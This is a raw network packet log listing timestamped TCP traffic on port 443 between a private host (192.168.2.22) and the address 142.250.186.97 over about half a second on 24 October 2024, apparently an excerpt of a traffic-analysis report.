                                                                                              Oct 24, 2024 08:40:04.722625971 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.722661972 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.722661972 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.722670078 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.723951101 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.724133015 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.726504087 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.732826948 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.732881069 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.732891083 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.736435890 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.736464024 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.736520052 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.736529112 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.736574888 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.748034954 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.748162031 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.748265028 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.748265982 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.748277903 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.748326063 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.748642921 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.749514103 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.749553919 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.749572039 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.749582052 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.749650002 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.753880978 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.754066944 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.754101038 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.754143953 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.754154921 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.754162073 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.754271984 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.762907982 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.762937069 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.762953997 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.762962103 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.763089895 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.763098955 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774383068 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774466991 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.774476051 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774583101 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774622917 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774622917 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.774633884 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774799109 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.775093079 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.816430092 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.816454887 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.816483974 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.816495895 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.816620111 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.824755907 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.840496063 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.840517998 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.840543032 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.840553999 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.840658903 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.840747118 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841085911 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841116905 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841125011 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.841134071 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841176033 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.841181993 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841382980 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841586113 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.841593027 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.842067003 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.842093945 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.842123032 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.842128038 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.842134953 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.842190027 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.845179081 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.851843119 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.851881981 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.851887941 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.851896048 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.851938009 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.855220079 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.858678102 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.858689070 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.858709097 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.866811991 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.866884947 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.866895914 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867008924 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867202044 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.867211103 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867539883 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867583990 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867602110 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.867619991 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867671967 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.867677927 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.873166084 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.873274088 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.873282909 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.873377085 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.873495102 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.873502970 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.876033068 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.876194000 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.881587029 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.881639004 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.881705046 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.881726027 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.881736040 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.881792068 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.881880045 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.893223047 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.893248081 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.893280983 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.893294096 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.893338919 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.893345118 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.893774033 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.893811941 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.893814087 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.893822908 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.893867016 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.935230017 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.943355083 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.943413973 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.943444967 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.943458080 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.943495035 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.959374905 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.959424019 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.959511042 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.959523916 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.959963083 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.960093975 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.960144043 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.960155010 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.960196972 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.960372925 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.960416079 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.960445881 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.960473061 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.960479021 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.960484982 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.960612059 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.961142063 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.961199045 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.961205959 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.961240053 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.961294889 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.961303949 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.963984013 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.964035034 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.964044094 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.970597029 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.970653057 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.970662117 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.974060059 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.974160910 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.974169016 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.985730886 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.985814095 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.985888958 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.985898972 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.985934019 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.986018896 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.986337900 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.986373901 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.986381054 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.986462116 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.986522913 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.986530066 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.992104053 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.992182016 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.992191076 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.992222071 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.992263079 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.992292881 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.992301941 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.992405891 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.999871016 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.000145912 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.000452042 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.000539064 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.000611067 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.000628948 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.000727892 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.000777006 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.000783920 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.012048960 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.012131929 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.012141943 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.012185097 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.012231112 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.012238026 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.012576103 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.012620926 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.012630939 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.012638092 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.012706995 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.012852907 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.054092884 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.054153919 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.054168940 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.062235117 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.062284946 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.062294960 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.078274965 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.078337908 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.078350067 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.078422070 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.078484058 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.078491926 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.078733921 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.078768015 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.078773975 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.078805923 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.078932047 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.078938961 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.079293013 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.079327106 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.079328060 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.079341888 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.079405069 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.079411983 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.079797029 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.079850912 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.079859972 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.081613064 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.081619978 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.081661940 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.083134890 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.089323997 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.089369059 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.089375973 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.089390993 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.089438915 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.092875957 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.104491949 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.104540110 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.104564905 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.104576111 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.104603052 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.104617119 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.104624987 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.104655981 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.104861021 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.105138063 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.105178118 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.105190992 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.105197906 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.105227947 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.108369112 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.110914946 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.110958099 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.111054897 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.111063004 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.111160040 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.111192942 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.111206055 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.111213923 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.111342907 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.119249105 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.119388103 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.119425058 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.119443893 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.119452953 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.119493008 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.119649887 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.130799055 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.130841970 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.130845070 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.130856037 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.130886078 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.131091118 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.131309986 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.131349087 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.131383896 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.131392002 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.131438971 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.173242092 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.181164980 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.181207895 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.181293964 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.181303978 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.181340933 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.203509092 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.203563929 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.203591108 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.203619003 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.203634024 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.203684092 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.203691006 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.203701973 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.203759909 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.203788996 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.203794956 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.203850985 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.203886032 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.203938961 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.203963995 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.203984976 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.203994036 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.204030991 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.204044104 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.204051018 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.204094887 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.204102039 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.204864025 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.204895020 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.204931974 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.204932928 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.204946041 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.204971075 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.208240032 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.208281040 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.208290100 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.211672068 CEST44349172142.250.186.97192.168.2.22
